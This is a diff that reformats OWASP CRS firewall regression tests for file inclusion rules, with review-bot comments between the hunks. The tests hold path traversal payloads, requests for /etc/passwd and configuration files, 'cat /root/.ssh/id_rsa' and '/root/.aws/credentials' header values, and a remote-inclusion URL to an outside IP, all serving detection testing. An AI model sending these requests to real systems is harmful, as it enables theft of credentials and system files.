"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - uri: "/post" - data: | - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ - Content-Disposition: form-data; name="file"; filename="../1.7z" - Content-Type: application/octet-stream + - input: + dest_addr: "localhost" + method: "POST" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABCDEFGIJKLMNOPQ + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + uri: "/post" + data: | + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ + Content-Disposition: form-data; name="file"; filename="../1.7z" + Content-Type: application/octet-stream - BINARYDATA - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ-- - version: "HTTP/1.1" - output: - log_contains: id "930110" - - test_title: 930110-11 + BINARYDATA + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ-- + version: "HTTP/1.1" + output: + log: + expect_ids: [930110] + - test_id: 11 desc: 'Path Traversal Attack (..\) file upload' stages: - - stage: - input: - dest_addr: "localhost" - method: "POST" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABCDEFGIJKLMNOPQ - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - uri: "/post" - data: | - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ - Content-Disposition: form-data; name="file"; filename="..\1.7z" - Content-Type: application/octet-stream + - input: + dest_addr: "localhost" + method: "POST" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABCDEFGIJKLMNOPQ + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + uri: "/post" + data: | + 
------WebKitFormBoundaryABCDEFGIJKLMNOPQ + Content-Disposition: form-data; name="file"; filename="..\1.7z" + Content-Type: application/octet-stream - BINARYDATA - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ-- - version: "HTTP/1.1" - output: - log_contains: id "930110" - - test_title: 930110-12 + BINARYDATA + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ-- + version: "HTTP/1.1" + output: + log: + expect_ids: [930110] + - test_id: 12 desc: "Path Traversal Attack (;..;) query string" stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - Host: "localhost" - X-FTW: "This should trip" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?a=..;.\\.;\\." - version: "HTTP/1.1" - output: - log_contains: id "930110" + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + Host: "localhost" + X-FTW: "This should trip" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?a=..;.\\.;\\." + version: "HTTP/1.1" + output: + log: + expect_ids: [930110] diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml index 3e99e2d10..46ab1697e 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml 
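Review bot: The new `desc: |` block for test 7 ends with a doubled backtick after REQUEST_URI and, being a literal block scalar, carries a trailing newline into the description; `desc: >-` with the stray backtick removed yields a single clean line. That description also records that the negative expectation relies on httpd collapsing `/get/..` before ModSecurity sees `REQUEST_URI`; if the same file is run against a second web server in the matrix, that server may pass the dots through and the test would flip to a false failure, so it is worth confirming and, if so, expressing the expectation through the suite's platform-override mechanism rather than leaving the assumption implicit. Test 1 uses `dest_addr: "127.0.0.1"` while tests 2 to 12 use `dest_addr: "localhost"`; picking one within the file would be good hygiene.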
@@ -1,186 +1,184 @@ --- meta: author: "csanders-git, azurit" - description: None - enabled: true - name: 930120.yaml +rule_id: 930120 tests: - - test_title: 930120-1 + - test_id: 1 desc: Remote File Access Attempt (930120) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/index.php?file=News&op=../../../../../boot.ini%00" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/index.php?file=News&op=../../../../../boot.ini%00" + version: "HTTP/1.1" + output: + log: + expect_ids: [930120] + - test_id: 2 desc: Remote File Access Attempt (930120) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/index.php?file=News&op=/etc/passwd%00" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-3 + - input: + dest_addr: 127.0.0.1 + 
headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/index.php?file=News&op=/etc/passwd%00" + version: "HTTP/1.1" + output: + log: + expect_ids: [930120] + - test_id: 3 desc: Remote File Access Attempt (930120) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/index.php?file=News&op=../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf%00" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/index.php?file=News&op=../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf%00" + version: "HTTP/1.1" + output: + log: + expect_ids: [930120] + - test_id: 4 desc: "OS File Access" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?foo=arg&path_comp=.ssh/id_rsa" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-5 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?foo=arg&path_comp=.ssh/id_rsa" + version: "HTTP/1.1" + output: + log: + expect_ids: [930120] + - test_id: 5 desc: "LFI via parameter name: /sys" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?/sys/class=test" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-6 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?/sys/class=test" + version: "HTTP/1.1" + output: + log: + expect_ids: [930120] + - test_id: 6 desc: "LFI via parameter value: /sys" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?test=/sys/class" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-7 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?test=/sys/class" + version: "HTTP/1.1" + output: + log: + expect_ids: [930120] + - test_id: 7 desc: "LFI via parameter value: /etc/subuid" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?code=cat+%2Fetc%2Fsubuid" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-8 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?code=cat+%2Fetc%2Fsubuid" + version: "HTTP/1.1" + output: + log: + expect_ids: [930120] + - test_id: 8 desc: "LFI via parameter value: /etc/subuid-" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?code=cat+%2Fetc%2Fsubuid-" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-9 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?code=cat+%2Fetc%2Fsubuid-" + version: "HTTP/1.1" + output: + log: + expect_ids: [930120] + - test_id: 9 desc: | YM9WT5NU Disallow writing files to /tmp/ stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?code=>/tmp/curl" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-10 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?code=>/tmp/curl" + version: "HTTP/1.1" + output: + log: + expect_ids: [930120] + - test_id: 10 desc: | YM9WT5NU False positive test stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?code=>/tmp" - version: "HTTP/1.1" - output: - no_log_contains: id "930120" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?code=>/tmp" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [930120] diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml index ca1a8aa9e..821b89275 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml 
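Review bot: Scalar quoting is inconsistent across the migrated tests in this hunk: test_id 1–3 write `dest_addr: 127.0.0.1` and `method: GET` plain, while test_id 4–10 write `dest_addr: "127.0.0.1"` and `method: "GET"`; since the commit rewrites every stage line anyway, this was the moment to settle on one form file-wide (the quoted form matches the other 930xxx files in this diff). Test_id 1–3 also share the identical `desc: Remote File Access Attempt (930120) from old modsec regressions`, so a failure report names the rule but not which payload variant failed; consider differentiating them, e.g. `desc: Remote File Access Attempt (930120) from old modsec regressions - absolute path` for test_id 2. Neither point changes what the tests assert.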
@@ -1,216 +1,215 @@ --- meta: author: "Franziska Bühler, azurit" - enabled: true - name: 930121.yaml +rule_id: 930121 tests: - - test_title: 930121-1 + - test_id: 1 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "cat /root/.ssh/id_rsa" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "cat /root/.ssh/id_rsa" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [930121] + - test_id: 2 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "cat /etc/apache2/apache2/apache2.conf" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate 
+ Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "cat /etc/apache2/apache2/apache2.conf" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [930121] + - test_id: 3 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "cat /proc/sys/kernel/randomize_va_space" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "cat /proc/sys/kernel/randomize_va_space" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [930121] + - test_id: 4 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "cat /proc/net/tcp" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-5 + - input: + dest_addr: 
127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "cat /proc/net/tcp" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [930121] + - test_id: 5 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "cat /root/.aws/credentials" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "cat /root/.aws/credentials" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [930121] + - test_id: 6 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "cat /root/.ssh/id_rsa" - method: GET - port: 80 
- uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "cat /root/.ssh/id_rsa" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [930121] + - test_id: 7 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "/root/.aws/credentials" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "/root/.aws/credentials" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [930121] + - test_id: 8 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: 
localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "/proc/sys/kernel/randomize_va_space" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "/proc/sys/kernel/randomize_va_space" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [930121] + - test_id: 9 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "/proc/net/tcp" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "/proc/net/tcp" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [930121] + - test_id: 10 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "/root/.ssh/id_rsa" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "/root/.ssh/id_rsa" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [930121] diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml index caccac5ab..30983314c 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml 
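Review bot: test_id 6 in this hunk is byte-identical to test_id 1 (same headers, same `User-Agent: "cat /root/.ssh/id_rsa"`, same `uri: "/get"`, same expectation), so the migration carries over a duplicated case that adds run time but no coverage; either drop it and renumber, or record in its `desc` why a second copy is wanted. The same duplication exists in the 931110.yaml hunk, where test_id 3 repeats test_id 1's `uri: "/get/plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://foo.bar"`. All ten tests here also share the one `desc: Remote File Access Attempt (930121) in REQUEST_HEADERS`, which hides which header value is under test in a failure report; naming the target path in each `desc` would help triage.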
@@ -1,39 +1,37 @@ --- meta: author: "Andrew Howe, azurit" - description: "None" - enabled: true - name: "930130.yaml" +rule_id: 930130 tests: - - test_title: 930130-1 + - test_id: 1 desc: "LFI via URI: /sys" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/sys/class" - version: "HTTP/1.1" - output: - log_contains: id "930130" - - test_title: 930130-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/sys/class" + version: "HTTP/1.1" + output: + log: + expect_ids: [930130] + - test_id: 2 desc: "LFI via URI: /proc" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/proc/interrupts" - version: "HTTP/1.1" - output: - log_contains: id "930130" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/proc/interrupts" + version: "HTTP/1.1" + output: + log: + expect_ids: [930130] diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml index 11fc083e5..795b312ab 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml 
@@ -1,28 +1,26 @@ --- meta: author: "csanders-git, azurit" - description: None - enabled: true - name: 931100.yaml +rule_id: 931100 tests: - - test_title: 931100-1 + - test_id: 1 desc: Remote File Inclusion Attack (931100) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/wp-content/themes/thedawn/lib/scripts/timthumb.php?src=http://66.240.183.75/crash.php" - version: "HTTP/1.1" - output: - log_contains: id "931100" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/wp-content/themes/thedawn/lib/scripts/timthumb.php?src=http://66.240.183.75/crash.php" + version: "HTTP/1.1" + output: + log: + expect_ids: [931100] diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml index dbb3b8fb5..146646540 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml 
